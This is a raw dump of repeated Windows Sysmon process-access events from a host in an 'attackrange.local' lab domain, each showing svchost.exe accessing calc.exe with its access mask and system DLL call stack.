10341000x8000000000000000360250Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360249Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360248Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360247Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360246Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360245Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360244Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360243Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360242Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360241Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360240Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360239Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360238Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360237Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360236Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360235Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360234Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360233Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360232Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360231Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360230Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360229Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.593{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
